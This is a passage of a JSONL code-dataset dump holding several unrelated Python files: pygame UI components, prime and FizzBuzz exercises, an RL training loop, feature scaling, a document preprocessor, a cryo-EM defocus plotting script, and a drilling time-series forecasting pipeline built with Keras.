self.cible.y_sur_carte)\n\n x_pos, y_pos = self.carte.xy_carte_to_xy_relatif(self.x_sur_carte, self.y_sur_carte)\n pygame.gfxdraw.line(screen, x_pos, y_pos, x_cible, y_cible, COULEUR_ELEMENT_SELECTION)\n pygame.draw.circle(screen, COULEUR_ELEMENT_SELECTION, (x_cible, y_cible), 2)\n else:\n Personne.affiche_objectif(self, screen)\n","sub_path":"soldat.py","file_name":"soldat.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357647081","text":"from Components.Botao import Botao\nfrom Defaults import *\n\n\ndef Switch(posX, posY, opcoes, eventos, selecionado):\n\n\n tam = [resolucao[0] * 0.20, resolucao[1] * 0.027 + fonte.size(opcoes[0])[1]]\n rect = [posX - tam[0] / 2, posY - tam[1] / 2, tam[0], tam[1]]\n\n txt = fonte.render(str(opcoes[selecionado]), True, bg)\n posTxt = posX - txt.get_size()[0] / 2, posY - txt.get_size()[1] / 2\n\n mais = fonteArr.render(\">>\", True, bg)\n menos = fonteArr.render(\"<<\", True, bg)\n\n centros = [\n [mais.get_size()[0] / 2, mais.get_size()[1] / 2],\n [menos.get_size()[0] / 2, menos.get_size()[1] / 2]\n ]\n\n posMais = (posX + rect[3] * 1.7) - centros[0][0], posY - centros[0][1]\n posMenos = (posX - rect[3] * 1.7) - centros[1][0], posY - centros[1][1]\n\n\n container = engine.draw.rect(tela, branco, rect)\n engine.draw.rect(tela, branco, container, 3)\n\n mPos = engine.mouse.get_pos()\n\n\n if container.collidepoint(mPos):\n rect[0] -= (rect[2] * 0.2) / 2\n rect[2] *= 1.2\n container = engine.draw.rect(tela, branco, rect)\n engine.draw.rect(tela, branco, container, 3)\n\n\n mais = tela.blit(mais, posMais)\n menos = tela.blit(menos, posMenos)\n\n tela.blit(txt, posTxt)\n\n\n if mais.collidepoint(mPos):\n if click(eventos):\n if selecionado +1 < len(opcoes):\n selecionado += 1\n else:\n selecionado = 0\n\n if menos.collidepoint(mPos):\n if click(eventos):\n if selecionado -1 > -1:\n selecionado -= 1\n else:\n selecionado = len(opcoes) -1\n \n\n return selecionado\n\ndef click(evento):\n if evento != None and evento.type == engine.MOUSEBUTTONDOWN:\n return True\n","sub_path":"Components/Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459393314","text":"def GetPrimeList():\n primeList = []\n f = open('PrimeBelowMillion.txt')\n while True:\n line = f.readline()\n if not line: break\n primeList.append(int(line))\n f.close()\n return primeList\n\nprimeList = GetPrimeList()\n\ndef LargePrimeListGenerator(num):\n for i in range(1000000, num+1):\n limit = int(i**0.5)\n check=True\n for j in primeList:\n if j>limit: break\n elif i%j==0:\n check=False\n break\n if check:\n primeList.append(i)\n return primeList\n\ndef PrimeDetector(num):\n limit = num ** 0.5\n for i in primeList:\n if i>limit: return True\n elif num%i==0: return False\n return True\n\ndef PandigitalCheck(string):\n # 1. check 0\n if '0' in string: return False\n\n # 2. check number overflow\n digit = len(string)\n num_list = list(range(1, digit + 1))\n for i in string:\n if not (int(i) in num_list): return False\n\n # 3. check overlapped number\n for i in range(len(string)):\n for j in range(i,len(string)):\n if (i!=j) & (string[i] == string[j]):\n return False\n return True","sub_path":"basicFunctions.py","file_name":"basicFunctions.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177096985","text":"#FizzBuzz challenge\n#Write a program that prints the numbers from 1 to 100.\n#But for multiples of three print \"Fizz\" instead of the number\n#and for the multiples of five print \"Buzz\"\n\nfor i in range(1, 101):\n if i%3 == 0:\n if(i%5 == 0):\n print(\"FizzBuzz\")\n continue\n print(\"Fizz\")\n continue\n elif i%5 == 0:\n print(\"Buzz\")\n continue\n print(i)\n","sub_path":"FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629425248","text":"# Train agent for the number of episodes and in the mode specified by the user.\n\nimport pickle as cpickle\nimport agent as Agent\nfrom utils import print_summary\n\nNUM_BATCH = 1000\nNUM_EPISODES = 100\nTEST_FREQ = 2\n\ndef run_HAC(FLAGS,env,agent):\n\n # Print task summary\n print_summary(FLAGS,env)\n \n # Determine training mode. If not testing and not solely training, interleave training and testing to track progress\n mix_train_test = False\n if not FLAGS.test and not FLAGS.train_only:\n mix_train_test = True\n \n for batch in range(NUM_BATCH):\n \n # Evaluate policy every TEST_FREQ batches if interleaving training and testing\n if mix_train_test and batch % TEST_FREQ == 0:\n print(\"\\n--- TESTING ---\")\n agent.FLAGS.test = True\n \n # Reset successful episode counter\n successful_episodes = 0\n\n for episode in range(NUM_EPISODES):\n \n print(\"\\nBatch %d, Episode %d\" % (batch, episode))\n success = agent.train(env, episode)\n\n if success:\n print(\"Batch %d, Episode %d End Goal Achieved\\n\" % (batch, episode))\n \n # Increment successful episode counter if applicable\n if mix_train_test and batch % TEST_FREQ == 0:\n successful_episodes += 1 \n\n # Save agent\n agent.save_model(episode)\n \n # Finish evaluating policy if tested prior batch\n if mix_train_test and batch % TEST_FREQ == 0:\n\n # Log performance\n success_rate = successful_episodes / NUM_EPISODES * 100\n print(\"\\nTesting Success Rate %.2f%%\" % success_rate)\n agent.log_performance(success_rate)\n agent.FLAGS.test = False\n\n print(\"\\n--- END TESTING ---\\n\")\n\n \n\n \n \n\n \n","sub_path":"run_HAC.py","file_name":"run_HAC.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222847830","text":"import math\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\n\n# Import\ndf = pd.read_csv(\"./data/data.csv\")\n\n# Save these here as they go away when we scale with preprocessing\nX_columns = df.columns[:-1]\n\n# Drop Y values\nX_df = df.drop(labels=\"Y\", axis=\"columns\")\n\n# See docs here: https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.scale.html#sklearn.preprocessing.scale\n#\n# This scales such that the mean of each feature is 0.\nscaled = preprocessing.scale(X_df, with_std=False) # returns a nparray\nzero_mean_scaled_df = pd.DataFrame(data=scaled, columns=X_columns)\n\n# FOR THE MARKER\n#\n# HA! If I set 'with_std=True' in the preprocessing.scale, the transformed\n# dataset is exactly what I need. \n#\n# I realised this AFTER implementing all of below so I'm going to \n# keep this code in here just so you know that I know what's going on.\n\n# Let's do some manual work for this next part\nsum_of_squares_scaled = []\nfor column_name in zero_mean_scaled_df:\n column = zero_mean_scaled_df[column_name].tolist()\n n = len(column)\n\n sum_of_squares = 0\n for observation in column:\n sum_of_squares += (observation * observation)\n \n scale_factor = math.sqrt(n / sum_of_squares)\n scaled = []\n for observation in column:\n scaled.append(observation * scale_factor)\n\n sum_of_squares_scaled.append(scaled)\n \n# convert to nparray - need to transpose\nnp_matrix = np.array(sum_of_squares_scaled).T\n\n# convert to dataframe\nfinal_scaled_df = pd.DataFrame(data=np_matrix, columns=X_columns)\n# Add \"Y\" back on\nfinal_scaled_df[\"Y\"] = df[\"Y\"]\n# print(final_scaled_df.head())\n\n# save to csv for later\nfinal_scaled_df.to_csv(\"./data/transformed_data.csv\", index=False)\n\n# Now for the question, print out the sum of squares\nprint(\"Sum of squares for each transformed feature:\")\nfor column_name in final_scaled_df:\n if column_name == \"Y\":\n continue\n \n column = final_scaled_df[column_name].tolist()\n\n sum_of_squares = 0\n for observation in column:\n sum_of_squares += (observation * observation)\n\n print(f\"{column_name}: {sum_of_squares}\")\n\n","sub_path":"python/scripts/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360142026","text":"import codecs\n\nfrom fonduer.parser.preprocessors.doc_preprocessor import DocPreprocessor\nfrom fonduer.parser.preprocessors.text_doc_preprocessor import TextDocPreprocessor\n\n\nclass CSVPathsPreprocessor(DocPreprocessor):\n \"\"\"This `DocumentPreprocessor` treats inputs file as index of paths to\n actual documents; each line in the input file contains a path to a document.\n\n **Defaults and Customization:**\n\n * The input file is treated as a simple text file having one path per file.\n However, if the input is a CSV file, a pair of ``column`` and ``delim``\n parameters may be used to retrieve the desired value as reference path.\n\n * The referenced documents are treated as text document and hence parsed\n using ``TextDocPreprocessor``. However, if the referenced files are\n complex, an advanced parser may be used by specifying ``parser_factory``\n parameter to constructor.\n \"\"\"\n\n def __init__(\n self,\n path,\n parser_factory=TextDocPreprocessor,\n column=None,\n delim=\",\",\n *args,\n **kwargs\n ):\n \"\"\"\n :param path: input file having paths\n :param parser_factory: The parser class to be used to parse the\n referenced files. default = TextDocPreprocessor\n :param column: index of the column which references path.\n default=None, which implies that each line has only one column\n :param delim: delimiter to be used to separate columns when file has\n more than one column. It is active only when\n ``column is not None``. default=','\n \"\"\"\n super(CSVPathsPreprocessor, self).__init__(path, *args, **kwargs)\n self.column = column\n self.delim = delim\n self.parser = parser_factory(path)\n\n def _get_files(self, path):\n with codecs.open(path, encoding=self.encoding) as lines:\n for doc_path in lines:\n if self.column is not None:\n # if column is set, retrieve specific column from CSV record\n doc_path = doc_path.split(self.delim)[self.column]\n yield doc_path.strip()\n\n def parse_file(self, fp, file_name):\n return self.parser.parse_file(fp, file_name)\n","sub_path":"fonduer/parser/preprocessors/csv_paths_preprocessor.py","file_name":"csv_paths_preprocessor.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"257148841","text":"#!/bin/python2.7\n#(C)Ian Outhwaite, Long Lab, MSKCC 2019\n\n#for a CtfRefine \"particles_ctf_refine.star\" file: plots number of particles per micrograph versus standard deviation of defocus values, per micrograph\n#Particle defocus is defined in this script as ( ( _rlnDefocusU + _rlnDefocusV ) / 2 )\n\nimport sys, os\nimport string\nimport random\nimport numpy as np\nimport matplotlib\nfrom scipy import stats\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\n\nDU = '_rlnDefocusU'\nDV = '_rlnDefocusV'\nmic_name = '_rlnMicrographName'\nattributes = [DU,DV,mic_name]\n\n#gets the header of a star file, returns the columns in the file that the attributes fall into in dictionary form\ndef getHeader(lines):\n\trestoffile = []\n\theader = []\n\tinUnderscores = 0\n\ti = 0\n\twhile i= outlier_cutoff)\n \n # Using map created above, what is the smallest outlier?\n lower_cutoff = np.min(np.asarray(per[target]['gap_sizes'])[cutoff_map])\n \n # This is done to quickly mark gaps bigger than cutoff with zero and\n # other with NaN. This makes a good chart.\n from functools import partial\n \n def _cutoff(x, lower_cutoff=0):\n if x >= lower_cutoff:\n return 0\n else:\n return np.nan\n \n _cutoff_par = partial(_cutoff, lower_cutoff=lower_cutoff)\n mapped_outliers = list(map(_cutoff_par, m[target]))\n \n # plt.scatter(df[index], df[target], s=1, c='black', label='data')\n # plt.plot(df[index], mapped_outliers, c='red', label='Unusuable range') \n # # has to be plot to avoid index\n # # discontinuities\n \n # plt.grid()\n # plt.legend()\n # plt.title('Useful range analysis')\n # plt.xlabel(f'{index}')\n # plt.ylabel(f'{target}')\n # plt.show()\n #%%\n \n ## Automatic proposal of useful area, part 2\n \n # Simply finds the biggest area with acceptable gaps\n \n # TODO - check if the algorithm will detect a stride at the end of the dataset\n # because I have a feeling it won't!\n \n strides = []\n \n s_start = -1\n s_stop = -1\n \n for i in range(len(df)):\n if mapped_outliers[i] != 0 and s_start == -1:\n s_start = i\n elif mapped_outliers[i] == 0 and s_start != -1:\n s_stop = i\n strides.append([s_start, s_stop, s_stop - s_start ])\n \n s_start = -1\n s_stop = -1\n \n strides = np.asarray(strides)\n strides = strides[strides[:,2].argsort()][::-1] # sort by length [2] \n # and reverse\n # print(f'''Proposed range to use is row {strides[0,0]} to row {strides[0,1]}\n # for total of {strides[0,0]} rows\n # ''')\n # print(f'All found strides are: [start, stop, length]')\n # print(strides)\n \n s_start = strides[0,0]\n s_stop = strides[0,1]\n #%%\n \n ## cut the dataframe for the selected stride, redo the stats\n # From now on dfs is used (dataframe stride)\n margin_percent = 1 # since the edges can be a bit unpredictable, margin is\n # removed\n \n s_start = s_start + int((s_stop - s_start) * 0.01*margin_percent)\n s_stop = s_stop - int((s_stop - s_start) * 0.01*margin_percent)\n dfs = df.iloc[s_start:s_stop] # dfs = DataFrameStride\n s, m, per = stats(dfs)\n \n #%%\n \n ## Removing columns that contain big gaps\n \n from functools import partial\n \n def _cutoff_inv(x, lower_cutoff=0):\n if x >= lower_cutoff:\n return 1\n else:\n return 0\n \n _cutoff_par = partial(_cutoff_inv, lower_cutoff=lower_cutoff)\n \n killed_cols = []\n \n for column in list(dfs):\n mapped_outliers = list(map(_cutoff_par, m[column]))\n offender_count = np.sum(mapped_outliers)\n if offender_count > 0:\n dfs = dfs.drop(columns = [column])\n killed_cols.append([column, 100*offender_count/len(dfs)])\n \n killed_cols = pd.DataFrame(killed_cols, columns=['Name','Percent offending'])\n #print('Removed following columns due to outlier gap (showing under 15% only):')\n #print(killed_cols.sort_values(by='Percent offending')[killed_cols['Percent offending'] < 15])\n \n #%%\n \n ## Checking if first derivative of index is stable.\n \n index_dr = np.diff(dfs[index])\n \n index_mean = np.mean(index_dr)\n index_std = np.std(index_dr)\n index_maxgap = np.max(index_dr)\n deviation = np.abs(index_dr - index_mean)/index_std\n \n #print(f'Maximum distance from mean is {np.max(deviation):.1f} standard deviations')\n #print(f'If this value is above 6, there may be too high sampling frequency variation')\n \n #%%\n \n ## Counting zeros in the first derivative to see if it should be ffilled\n ## or linearly interpolated\n \n ## NOTE: Actual filling will not happen here, but AFTER the data split\n \n fill_method = {}\n \n for attribute in list(dfs):\n \n dropna_diff = np.diff(dfs[attribute].dropna())\n zeros_p = np.count_nonzero(dropna_diff == 0) / len(dropna_diff)\n \n if zeros_p > 0.9: # Threshold to check?\n fill_method[attribute] = 'ffill'\n else:\n fill_method[attribute] = 'linterp'\n \n \n #%%\n \n #%% \n \n ## Gap filling - but only forward filling. Linear interpolation is done later\n \n for attribute in list(dfs):\n if fill_method[attribute] == 'ffill':\n dfs[attribute] = dfs[attribute].ffill().rolling(5, center=True).mean().ffill().bfill()\n \n #%%\n \n \n \n #%%\n \n ## DATA SPLIT\n \n #split = 0.6 #portion of data available\n future = 0.15 #section after available, for testing\n \n X = dfs.drop(target, axis=1)\n y = dfs[target].to_frame()\n \n splitpoint = int(len(dfs)*split)\n futurepoint = int(len(dfs)*(split+future))\n \n X_train = X[:splitpoint]\n y_train = y[:splitpoint]\n X_test = X[splitpoint:futurepoint]\n y_test = y[splitpoint:futurepoint]\n \n \n #%%\n \n ## Linear interpolation after split, so the future does not leak.\n \n \n for attribute in list(X_train):\n if fill_method[attribute] == 'linterp':\n X_train = X_train.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for attribute in list(y_train):\n if fill_method[attribute] == 'linterp':\n y_train = y_train.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for attribute in list(X_test):\n if fill_method[attribute] == 'linterp':\n X_test = X_test.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for attribute in list(y_test):\n if fill_method[attribute] == 'linterp':\n y_test = y_test.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n \n \n \n \n \n \n #%%\n \n ## Resampling\n \n from sklearn.neighbors import RadiusNeighborsRegressor\n \n reg = RadiusNeighborsRegressor()\n \n step_length = index_mean * hstep_extension\n \n i_train_min = np.min(X_train[index])\n i_train_max = np.max(X_train[index])\n i_test_min = np.min(X_test[index])\n i_test_max = np.max(X_test[index])\n \n index_train = np.arange(i_train_min, i_train_max, step_length).reshape(-1,1)\n index_test = np.arange(i_test_min, i_test_max, step_length).reshape(-1,1)\n \n \n reg = RadiusNeighborsRegressor(radius=index_maxgap, weights='distance')\n \n reg.fit(X_train[index].to_numpy().reshape(-1,1), y_train[target].to_numpy())\n y_train = pd.DataFrame()\n y_train[target] = reg.predict(index_train)\n \n reg.fit(X_test[index].to_numpy().reshape(-1,1), y_test[target].to_numpy())\n y_test = pd.DataFrame()\n y_test[target] = reg.predict(index_test)\n \n X_train_resampled = pd.DataFrame()\n for attribute in list(X_train):\n reg.fit(X_train[index].to_numpy().reshape(-1,1), X_train[attribute].to_numpy())\n X_train_resampled[attribute] = reg.predict(index_train)\n \n X_train = X_train_resampled\n \n \n \n X_test_resampled = pd.DataFrame()\n for attribute in list(X_train):\n reg.fit(X_test[index].to_numpy().reshape(-1,1), X_test[attribute].to_numpy())\n X_test_resampled[attribute] = reg.predict(index_test)\n \n X_test = X_test_resampled\n #%%\n \n ## Inclination to delta inclination convertion needed here!\n \n convert_to_diff = []#['MWD Continuous Inclination dega']\n lcs_list = ['MWD Continuous Inclination dega'] #list of parameters that are to be in local coordinate system\n \n for attr in convert_to_diff:\n if attr == target:\n y_train[attr] = y_train[attr].diff().bfill() #bfill to kill initial NaN\n y_test[attr] = y_test[attr].diff().bfill()\n else:\n X_train[attr] = X_train[attr].diff().bfill()\n X_test[attr] = X_test[attr].diff().bfill()\n #%%\n \n ## Scaling the data. Note that range is decide on the training dataset only!\n \n scaler_X = MinMaxScaler()\n scaler_y = MinMaxScaler()\n \n X_train[X_train.columns] = scaler_X.fit_transform(X_train[X_train.columns])\n y_train[y_train.columns] = scaler_y.fit_transform(y_train[y_train.columns])\n \n ## Test portion is tranformed based on the existing scaler\n X_test[X_test.columns] = scaler_X.transform(X_test[X_test.columns])\n y_test[y_test.columns] = scaler_y.transform(y_test[y_test.columns])\n \n \n #%%\n \n ## Dataframe for use in correlation analysis, where X_train and y_train is\n ## together\n df_train = X_train\n df_train = df_train.merge(y_train, how='outer', left_index=True,\n right_index=True)\n \n #%%\n \n ## Choice of attribute selection method done on the complete dataset\n ## NOTE: PCA has to be applied AFTER the split, never before!\n \n # print('''Choose attribute selection method:\n # 1) pearson coefficient\n # 2) PCA\n # 3) ppscore''')\n \n asel_choice = '2'#input('Your choice:')\n \n #%%\n ## Simple correlation, pearson, straight from Pandas\n \n ## Note that correlations are re-done after each split, and done only on the\n ## training dataset!\n \n ## [] Ensure that Index is carried forward!\n \n PCA_n = -1 #i.e. not in use\n \n \n if asel_choice == '1':\n \n dfs_corr = df_train.corr(method='pearson')\n corr_values = dfs_corr[target].to_numpy()\n corr_index = dfs_corr[target].index.to_numpy()\n \n corr_m = np.column_stack((corr_values, corr_index))\n \n for i in range(len(corr_m)):\n if np.isnan(corr_m[i,0]):\n corr_m[i,0] = 0\n else:\n corr_m[i,0] = np.abs(corr_m[i,0])\n \n corr_m = corr_m[corr_m[:,0].argsort()]\n \n keep_columns = corr_m[-1-hAttrCount:-1,1]\n\n \n X_train = X_train[keep_columns]\n X_test = X_test[keep_columns]\n \n \n \n ## PCA based \n \n \n elif asel_choice == '2':\n from sklearn.decomposition import PCA\n \n keep_columns = [] #empty for future code compatibility\n\n \n PCA_n = hAttrCount\n \n # applied after sensitivity analysis\n \n ## ppscore based\n \n elif asel_choice == '3':\n import ppscore as pps\n dfs_corr = pps.predictors(df_train, target, output='list')\n \n \n min_required_ppscore = 0.3\n \n keep_columns = []\n for i in range(len(dfs_corr)):\n if dfs_corr[i]['ppscore'] > min_required_ppscore:\n keep_columns.append(dfs_corr[i]['x'])\n \n X_train = X_train[keep_columns]\n X_test = X_test[keep_columns]\n \n \n else:\n sys.exit(\"Error, incorrect attribute selection choice\")\n \n \n #%%\n \n ## Sensitivity study gets applied here. Note that sensitivity for PCA is done\n ## on ALL available parameters, while for ppscore or pearson only on selected ones\n \n \n #%%\n \n ## Applying PCA. It is done late to preserve all attributes for sensitivity test\n if PCA_n != -1:\n scaler_pca = MinMaxScaler() # new scaler here because PCA can push \n # variables out of (-1,1) bounds\n \n pca = PCA(n_components = PCA_n)\n \n X_train = pca.fit_transform(X_train)\n X_train = scaler_pca.fit_transform(X_train)\n \n X_test = pca.transform(X_test)\n X_test = scaler_pca.transform(X_test)\n \n \n \n \n \n #%%\n \n ## Data shaping\n \n ## from now on, arrays are being morphed into shapes valid for RNN+MLP\n \n memory = int(hMemoryMeters/step_length)\n \n imagination = int(imagination_meters/step_length)\n \n X_attr = list(X_train)\n \n try:\n X_train = X_train.to_numpy() \n X_test = X_test.to_numpy()\n y_train = y_train.to_numpy()\n y_test = y_test.to_numpy() \n except:\n y_train = y_train.to_numpy()\n y_test = y_test.to_numpy()\n \n X_test = np.concatenate([X_train[-memory+1:,:], X_test], axis=0)\n y_test = np.concatenate([y_train[-memory+1:], y_test], axis=0)\n #%%\n \n def prepare(data, start, stop, cut_margin = 0, lcs=False):\n memory = stop-start\n stack = []\n for i in range(memory):\n stack.append(np.roll(data, -i))\n \n stack = np.flip(np.rot90(stack), axis=0)[start:-memory+1-cut_margin]\n \n if lcs == True:\n zero = stack[:,0]\n \n for j in range(len(zero)):\n stack[j] = stack[j] - zero[j]\n return stack\n \n target_lcs_correction = 1\n \n if target in lcs_list:\n X_train_RNN = prepare(np.squeeze(y_train), 0, memory, cut_margin = imagination, lcs=True)\n X_test_RNN = prepare(np.squeeze(y_test), 0, memory, cut_margin = imagination, lcs=True)\n \n y_train_RNN = prepare(np.squeeze(y_train), memory, memory+imagination, lcs=True)\n y_test_RNN = prepare(np.squeeze(y_test), memory, memory+imagination, lcs=True)\n \n offset_train = X_train_RNN[:,-1]\n offset_test = X_test_RNN[:,-1]\n \n for k in range(len(offset_train)):\n y_train_RNN[k] = y_train_RNN[k] + offset_train[k]\n \n for k in range(len(offset_test)):\n y_test_RNN[k] = y_test_RNN[k] + offset_test[k]\n \n target_lcs_correction = 1/np.max(y_train_RNN)\n \n y_train_RNN = y_train_RNN * target_lcs_correction\n X_train_RNN = X_train_RNN * target_lcs_correction\n y_test_RNN = y_test_RNN * target_lcs_correction\n X_test_RNN = X_test_RNN * target_lcs_correction\n \n else:\n X_train_RNN = prepare(np.squeeze(y_train), 0, memory, cut_margin = imagination)\n X_test_RNN = prepare(np.squeeze(y_test), 0, memory, cut_margin = imagination)\n y_train_RNN = prepare(np.squeeze(y_train), memory, memory+imagination)\n y_test_RNN = prepare(np.squeeze(y_test), memory, memory+imagination)\n \n #%%\n \n \n \n \n X_train_MLP = []\n X_test_MLP = []\n \n #%%\n if PCA_n == -1:\n X_lcs_correction = [1]*len(X_train[0])\n \n for i in range(len(X_train[0])):\n if keep_columns[i] in lcs_list:\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination, lcs=True))\n X_lcs_correction[i] = 1/np.max(X_train_MLP[i])\n X_train_MLP[i] = X_train_MLP[i]*X_lcs_correction[i]\n else:\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination))\n \n X_train_MLP = np.asarray(X_train_MLP)\n X_train_MLP = np.concatenate(X_train_MLP[:,:, np.newaxis], axis = 1)\n X_train_MLP = np.rot90(X_train_MLP, axes=(1,2), k=3)\n \n \n \n \n \n for i in range(len(X_test[0])):\n if keep_columns[i] in lcs_list:\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination, lcs=True))\n X_test_MLP[i] = X_test_MLP[i]*X_lcs_correction[i]\n else:\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination))\n \n X_test_MLP = np.asarray(X_test_MLP)\n X_test_MLP = np.concatenate(X_test_MLP[:,:, np.newaxis], axis = 1)\n X_test_MLP = np.rot90(X_test_MLP, axes=(1,2), k=3)\n \n else:\n for i in range(len(X_train[0])):\n X_train_MLP.append(prepare(X_train[:,i],memory,memory+imagination))\n \n X_train_MLP = np.asarray(X_train_MLP)\n X_train_MLP = np.concatenate(X_train_MLP[:,:, np.newaxis], axis = 1)\n X_train_MLP = np.rot90(X_train_MLP, axes=(1,2), k=3)\n \n for i in range(len(X_test[0])):\n X_test_MLP.append(prepare(X_test[:,i],memory,memory+imagination))\n \n X_test_MLP = np.asarray(X_test_MLP)\n X_test_MLP = np.concatenate(X_test_MLP[:,:, np.newaxis], axis = 1)\n X_test_MLP = np.rot90(X_test_MLP, axes=(1,2), k=3)\n #%%\n \n X_train_RNN_m = X_train_RNN[:,:,np.newaxis]\n #X_train_MLP_m = X_train_MLP[:,:,np.newaxis]\n X_train_m = [X_train_RNN_m, X_train_MLP]#_m]\n \n X_test_RNN_m = X_test_RNN[:,:,np.newaxis]\n #X_test_MLP_m = X_test_MLP[:,:,np.newaxis]\n X_test_m = [X_test_RNN_m, X_test_MLP]#_m]\n #%%\n \n \n \n #%%\n \n ## Local coordinate system\n \n ## Just a cumsum on parameter converted to delta earlier\n \n \n #%%\n \n ## ML model definition\n \n from tensorflow.keras import Model, Input\n from tensorflow.keras.layers import (Dense, Dropout, GRU, Flatten,\n GaussianNoise, concatenate, LSTM,\n Bidirectional, TimeDistributed)\n from tensorflow.keras.layers import Conv1D\n from tensorflow.keras.layers import MaxPool1D\n from tensorflow.keras.callbacks import EarlyStopping\n from tensorflow.keras.callbacks import ModelCheckpoint\n import tensorflow as tf\n \n from tensorflow.keras.models import load_model\n \n physical_devices = tf.config.list_physical_devices('GPU') \n tf.config.experimental.set_memory_growth(physical_devices[0], True)\n \n tf.keras.backend.clear_session()\n \n visible1 = Input(shape=(memory,1))\n \n \n visible2 = Input(shape=((imagination),len(X_train[0])))\n\n x1 = TimeDistributed(Dense(hDense4))(visible1) \n x1 = GRU(units=hGRU, kernel_initializer = 'glorot_uniform',\n recurrent_initializer='orthogonal',\n bias_initializer=\"zeros\", kernel_regularizer='l2', recurrent_regularizer=None,\n bias_regularizer=None, activity_regularizer=None, kernel_constraint=None,\n recurrent_constraint=None, bias_constraint=None, return_sequences=True,\n return_state=False, stateful=False)(x1)\n\n x1 = Dense(imagination)(x1)\n x1 = Flatten()(x1)\n x1 = Dropout(hDrop1)(x1)\n\n\n\n x2 = TimeDistributed(Dense(hDense5))(visible2)\n dense2 = Dense(hDense1, activation=\"linear\")(x2)\n drop2 = Dropout(hDrop2)(dense2)\n flat2 = Flatten()(drop2)\n dense2 = Dense(imagination, activation='linear')(flat2)\n drop2 = Dropout(hDrop3)(flat2)\n \n combined = concatenate([x1, drop2])\n \n z = Dense(hDense3, activation=\"relu\")(combined)\n z = Dense(imagination, activation=\"linear\")(z)\n\n \n model = Model(inputs=[visible1, visible2], outputs=z)\n \n \n \n \n es = EarlyStopping(monitor='val_loss', mode='min', verbose=0, patience=50)\n \n mc = ModelCheckpoint('best_model.h5', monitor='val_loss',\n mode='min', save_best_only=True, verbose=0)\n \n\n model.compile(optimizer='adam',loss='mean_squared_error')\n plot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)\n \n ## Training \n rowcount = len(y_train_RNN)\n val_border = int(rowcount*0.85)\n \n X_train_m_a = []\n X_train_m_b = []\n \n X_train_m_a.append(X_train_m[0][:val_border])\n X_train_m_a.append(X_train_m[1][:val_border])\n \n X_train_m_b.append(X_train_m[0][val_border:])\n X_train_m_b.append(X_train_m[1][val_border:])\n \n \n \n y_train_RNN_a = y_train_RNN[:val_border]\n y_train_RNN_b = y_train_RNN[val_border:]\n \n \n history = model.fit(X_train_m_a,y_train_RNN_a,validation_data=(X_train_m_b,y_train_RNN_b),\n epochs=2000, verbose=0, batch_size=32,\n callbacks=[es, mc])\n \n model = load_model('best_model.h5')\n \n\n result_test = model.evaluate(X_test_m, y_test_RNN, verbose=0)\n \n # image = np.abs(y_test_RNN*target_lcs_correction - result_test*target_lcs_correction)\n # mae = np.mean(image, axis=0)\n\n\n # Plots\n pred = model.predict(X_train_m, verbose=0)\n \n for i in range(10):\n s = np.random.randint(0, len(y_train_RNN))\n \n x = np.arange(0,len(X_train_RNN[0]),1)\n \n plt.title('Train')\n plt.plot(x, X_train_RNN[s], label='RNN input')\n \n x = np.arange(len(X_train_RNN[0]), len(X_train_RNN[0]) + len(y_train_RNN[0]),1)\n plt.plot(x,y_train_RNN[s], label='RNN output, true')\n \n \n \n plt.plot(x,pred[s], label='RNN output, predicted')\n plt.legend()\n \n \n plt.show()\n \n pred = model.predict(X_test_m)\n \n \n for i in range(5):\n s = np.random.randint(0, len(y_test_RNN))\n \n x = np.arange(0,len(X_test_RNN[0]),1)\n \n plt.plot(x, X_test_RNN[s], label='RNN input')\n \n x = np.arange(len(X_test_RNN[0]), len(X_test_RNN[0]) + len(y_test_RNN[0]),1)\n plt.plot(x,y_test_RNN[s], label='RNN output, true')\n \n \n plt.title('test')\n plt.plot(x,pred[s], label='RNN output, predicted')\n plt.legend()\n plt.show()\n \n truth = y_test_RNN/target_lcs_correction/scaler_y.scale_\n \n pred = pred/target_lcs_correction/scaler_y.scale_\n\n if np.isnan(result_test):\n result_test = 0\n #print(-np.log10(result_test))\n \n print(f'MAE: {np.average(np.abs(truth-pred))}')\n return truth, pred, -np.log10(result_test)\n\n\n#%%\n# Tuning\n\ndef optimize_me(hGRU,\n hDrop1,\n hDrop2, \n hDrop3,\n hDense1,\n hDense2,\n hDense3,\n hDense4,\n hDense5):\n truths = []\n preds = []\n quals = []\n for i in np.arange(0.2,0.85,0.01):\n print(f'Working on {i*100}%')\n truth, pred, qual = run_me(i, hGRU,\n hDrop1,\n hDrop2, \n hDrop3,\n hDense1,\n hDense2,\n hDense3,\n hDense4,\n hDense5)\n #print(f'Quality is {qual:.2f}')\n truths.append(truth)\n preds.append(pred)\n quals.append(qual)\n \n \n diffs = []\n \n for i in range(len(truths)):\n diffs.append(np.average(np.abs(truths[i] - preds[i]), axis=0))\n \n\n print(-np.average(diffs))\n return truths, preds, quals, 